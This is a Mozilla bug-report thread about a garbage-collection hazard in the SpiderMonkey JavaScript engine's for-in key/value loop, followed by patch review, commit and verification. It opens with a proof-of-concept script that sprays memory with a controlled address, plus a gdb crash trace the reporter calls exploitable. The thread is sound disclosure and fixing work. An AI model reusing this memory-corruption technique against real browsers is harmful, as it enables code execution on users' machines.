$ cat for-in-kv-GC-hazard.txt var address = 0xbadf00d0, basket = { food: {} }; var AP = Array.prototype, rooter = {}; AP.__defineGetter__(0, function() { return this[-1]; }); AP.__defineSetter__(0, function(v) { basket.food = null; for(var i = 0; i < 8 * 1024; i++) { rooter[i] = 0x10000000000000 + address; // IEEE754! } return this[-1] = v; }); for(var [key, value] in basket) { value.trigger; } $ gdb --eval run --args dbg.obj/js -b 99999 for-in-kv-GC-hazard.txt ... Program received signal SIGSEGV, Segmentation fault. 0x00475b83 in js_Interpret (cx=0xb507a0, pc=0xb541b6 "5", result=0xa2ec50) at jsinterp.c:3851 3851 CACHED_GET(OBJ_GET_PROPERTY(cx, obj, id, &rval)); (gdb) print *obj $1 = {map = 0xbadf00d0, slots = 0x43300000} ... You can control obj->map, map->ops, ops->getProperty, etc. => exploitable.

It seems for me it is a dup of bug 354499.

To shutdown@flashmail.com : I am curious, did you find this with a help of some tool or just by checking the source? If the former, then we should land the fix ASAP.

Note that is not a duplicate of bug 354499, it is a different problem that is not covered by the original case.

To clear the situation. With the cleanup patch for bug 354982 landed the fix bug 354499 would enough to solve the problem. Now if it would be necessary to fix the issue before that we need an extra patch that roots the atom.

This is a patch for 1.8.1 branch if it would be necessary to resolve this before landing on 1.8.1 branch the cleanup patch from bug 354982. Otherwise the patch should *not* be applied.

The previous patch was empty.

Comment on attachment 241275 [details] [diff] [review] Quick fix for for 1.8.1-only for real I'd rather take the larger patch, but sure -- this is brute force, at the cost atomic increment and decrement. /be

(In reply to comment #2) > To shutdown@flashmail.com : I am curious, did you find this with a help > of some tool or just by checking the source? If the former, then we > should land the fix ASAP. just by checking the source.

Blocking for Fx2 RC3

Comment on attachment 241275 [details] [diff] [review] Quick fix for for 1.8.1-only for real Approved for RC3.

I committed the patch from comment 6 to MOZILLA_1_8_BRANCH: Checking in jsinterp.c; /cvsroot/mozilla/js/src/jsinterp.c,v <-- jsinterp.c new revision: 3.181.2.69; previous revision: 3.181.2.68 done

This appears to be a js1.7 fix that's not needed in 1.8.0.8 -- please renominate if I'm wrong.

verified fixed 20061009 1.8 windows/linux/mac* 1.9 windows/linux. note the harness failed to capture the test results but did not crash. running the test manually showed no problems.

reset Array.prototype[0]

/cvsroot/mozilla/js/tests/js1_7/extensions/regress-355410.js,v <-- regress-355410.js